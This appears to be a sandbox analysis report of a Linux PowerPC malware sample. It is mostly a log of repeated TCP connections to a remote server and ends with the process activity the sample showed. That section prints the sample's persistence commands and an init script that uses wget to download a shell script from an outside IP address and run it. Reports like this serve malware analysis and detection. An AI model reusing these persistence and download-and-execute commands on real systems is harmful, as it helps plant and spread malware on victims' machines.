                                                                    Dec 27, 2024 09:15:09.772604942 CET6009838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:09.893348932 CET382426009894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:10.278630972 CET6009838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:10.438993931 CET382426009894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:10.937583923 CET382426009894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:10.937711000 CET6009838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:11.279941082 CET6010038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:11.399348974 CET382426010094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:11.399652004 CET6010038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:11.399759054 CET6010038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:11.519145012 CET382426010094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:11.905813932 CET6010038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:12.066917896 CET382426010094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:12.592650890 CET382426010094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:12.592746019 CET6010038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:12.906894922 CET6010238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:13.026429892 CET382426010294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:13.026545048 CET6010238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:13.026576996 CET6010238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:13.146708012 CET382426010294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:13.531321049 CET6010238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:13.690956116 CET382426010294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:14.532640934 CET6010438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:14.652204037 CET382426010494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:14.652333975 CET6010438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:14.652534962 CET6010438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:14.772006035 CET382426010494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:15.156686068 CET6010438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:15.322964907 CET382426010494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:15.846704006 CET382426010494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:15.846801043 CET6010438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:16.157566071 CET6010638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:16.277110100 CET382426010694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:16.277199984 CET6010638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:16.277400017 CET6010638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:16.396848917 CET382426010694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:16.781405926 CET6010638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:16.943046093 CET382426010694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:17.548021078 CET382426010694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:17.548252106 CET6010638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:17.782479048 CET6010838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:17.902244091 CET382426010894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:17.902400970 CET6010838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:17.902441978 CET6010838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:18.025223017 CET382426010894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:18.406653881 CET6010838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:18.567236900 CET382426010894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:19.099028111 CET382426010894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:19.099200010 CET6010838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:19.407883883 CET6011038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:19.527534962 CET382426011094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:19.527686119 CET6011038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:19.527710915 CET6011038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:19.647310019 CET382426011094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:20.032561064 CET6011038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:20.199018002 CET382426011094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:20.666914940 CET382426011094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:20.667042017 CET6011038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:21.033770084 CET6011238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:21.153287888 CET382426011294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:21.153371096 CET6011238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:21.153387070 CET6011238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:21.272900105 CET382426011294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:21.656938076 CET6011238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:21.819072008 CET382426011294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:22.368685007 CET382426011294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:22.368767977 CET6011238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:22.657840014 CET6011438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:22.777389050 CET382426011494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:22.777486086 CET6011438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:22.777518988 CET6011438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:22.896985054 CET382426011494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:23.282649994 CET6011438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:23.443047047 CET382426011494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:24.069003105 CET382426011494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:24.069190979 CET6011438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:24.284534931 CET6011638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:24.404057026 CET382426011694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:24.404278040 CET6011638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:24.404334068 CET6011638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:24.523857117 CET382426011694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:24.909332991 CET6011638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:25.071053028 CET382426011694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:25.664619923 CET382426011694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:25.664868116 CET6011638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:25.910959959 CET6011838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:26.030559063 CET382426011894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:26.030818939 CET6011838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:26.030951023 CET6011838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:26.150377035 CET382426011894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:26.536915064 CET6011838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:26.699074984 CET382426011894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:27.195244074 CET382426011894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:27.195369959 CET6011838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:27.538469076 CET6012038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:27.658029079 CET382426012094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:27.658143044 CET6012038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:27.658214092 CET6012038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:27.777651072 CET382426012094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:28.185467005 CET6012038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:28.347094059 CET382426012094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:28.819380999 CET382426012094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:28.819518089 CET6012038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:29.187284946 CET6012238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:29.306898117 CET382426012294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:29.307018995 CET6012238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:29.307091951 CET6012238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:29.426552057 CET382426012294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:29.813236952 CET6012238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:29.975080967 CET382426012294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:30.475779057 CET382426012294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:30.475882053 CET6012238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:30.814420938 CET6012438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:30.934103012 CET382426012494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:30.934277058 CET6012438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:30.934345007 CET6012438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:31.053790092 CET382426012494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:31.439555883 CET6012438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:31.603132010 CET382426012494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:32.104161024 CET382426012494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:32.104274035 CET6012438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:32.440666914 CET6012638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:32.560360909 CET382426012694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:32.560473919 CET6012638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:32.560563087 CET6012638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:32.680085897 CET382426012694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:33.065908909 CET6012638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:33.227226973 CET382426012694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:33.723864079 CET382426012694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:33.723964930 CET6012638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:34.067302942 CET6012838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:34.187243938 CET382426012894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:34.187509060 CET6012838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:34.187509060 CET6012838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:34.307157993 CET382426012894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:34.692234993 CET6012838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:34.855139971 CET382426012894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:34.999424934 CET382426010294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:34.999625921 CET6010238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:35.435411930 CET382426012894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:35.435544014 CET6012838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:35.693500996 CET6013038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:35.813258886 CET382426013094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:35.813662052 CET6013038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:35.813662052 CET6013038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:35.933557034 CET382426013094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:36.319772005 CET6013038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:36.487135887 CET382426013094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:36.939527035 CET382426013094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:36.939810991 CET6013038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:37.321465969 CET6013238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:37.441257954 CET382426013294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:37.441632032 CET6013238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:37.441632986 CET6013238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:37.561711073 CET382426013294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:37.947143078 CET6013238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:38.107170105 CET382426013294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:38.604708910 CET382426013294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:38.604852915 CET6013238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:38.948555946 CET6013438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:39.068203926 CET382426013494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:39.068459034 CET6013438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:39.068512917 CET6013438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:39.188162088 CET382426013494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:39.573427916 CET6013438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:39.736002922 CET382426013494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:40.271518946 CET382426013494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:40.271615982 CET6013438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:40.575567961 CET6013638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:40.695641994 CET382426013694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:40.695938110 CET6013638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:40.696060896 CET6013638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:40.815640926 CET382426013694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:41.203011036 CET6013638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:41.363174915 CET382426013694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:41.853236914 CET382426013694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:41.853312016 CET6013638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:42.204761028 CET6013838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:42.324493885 CET382426013894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:42.324620008 CET6013838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:42.324697018 CET6013838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:42.444809914 CET382426013894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:42.831358910 CET6013838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:42.995197058 CET382426013894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:43.506899118 CET382426013894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:43.507126093 CET6013838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:43.832535028 CET6014038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:43.952349901 CET382426014094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:43.952476025 CET6014038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:43.952531099 CET6014038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:44.072197914 CET382426014094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:44.457462072 CET6014038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:44.619231939 CET382426014094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:45.169123888 CET382426014094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:45.169202089 CET6014038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:45.459203959 CET6014238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:45.578943968 CET382426014294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:45.579068899 CET6014238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:45.579121113 CET6014238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:45.698710918 CET382426014294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:46.083925009 CET6014238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:46.247196913 CET382426014294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:46.753623009 CET382426014294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:46.753716946 CET6014238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:47.085310936 CET6014438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:47.205027103 CET382426014494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:47.205161095 CET6014438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:47.205238104 CET6014438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:47.324882984 CET382426014494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:47.709836006 CET6014438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:47.871099949 CET382426014494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:48.382467985 CET382426014494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:48.382607937 CET6014438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:48.711044073 CET6014638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:48.830703020 CET382426014694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:48.830760956 CET6014638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:48.830961943 CET6014638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:48.950438976 CET382426014694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:49.335997105 CET6014638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:49.499264956 CET382426014694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:49.994424105 CET382426014694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:49.994534016 CET6014638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:50.337291002 CET6014838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:50.457443953 CET382426014894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:50.457532883 CET6014838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:50.457571983 CET6014838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:50.577049971 CET382426014894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:50.961971998 CET6014838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:51.123286963 CET382426014894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:51.743705988 CET382426014894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:51.743851900 CET6014838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:51.963120937 CET6015038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:52.082751036 CET382426015094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:52.082829952 CET6015038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:52.082865000 CET6015038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:52.202378988 CET382426015094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:52.587603092 CET6015038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:52.751234055 CET382426015094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:53.287478924 CET382426015094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:53.287614107 CET6015038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:53.588674068 CET6015238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:53.708192110 CET382426015294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:53.708286047 CET6015238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:53.708368063 CET6015238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:53.827982903 CET382426015294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:54.213468075 CET6015238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:54.375245094 CET382426015294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:54.905900955 CET382426015294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:54.905996084 CET6015238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:55.214735985 CET6015438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:55.722238064 CET382426015494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:55.722373962 CET6015438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:55.722456932 CET6015438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:55.842040062 CET382426015494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:56.228235960 CET6015438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:56.391196966 CET382426015494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:56.944562912 CET382426015494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:56.944684029 CET6015438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:57.229940891 CET6015638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:57.349673033 CET382426015694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:57.349788904 CET6015638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:57.349849939 CET6015638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:57.469521999 CET382426015694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:57.855070114 CET6015638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:58.015294075 CET382426015694.156.227.234192.168.2.23

                                                                    System Behavior

                                                                    Start time (UTC):08:13:40
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/dash
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:40
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/rm
                                                                    Arguments:rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK
                                                                    File size:72056 bytes
                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                    Start time (UTC):08:13:40
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/dash
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:40
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/rm
                                                                    Arguments:rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK
                                                                    File size:72056 bytes
                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:/tmp/powerpc.nn.elf
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl enable custom.service
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/chmod
                                                                    Arguments:chmod +x /etc/init.d/system
                                                                    File size:63864 bytes
                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/ln
                                                                    Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                    File size:76160 bytes
                                                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
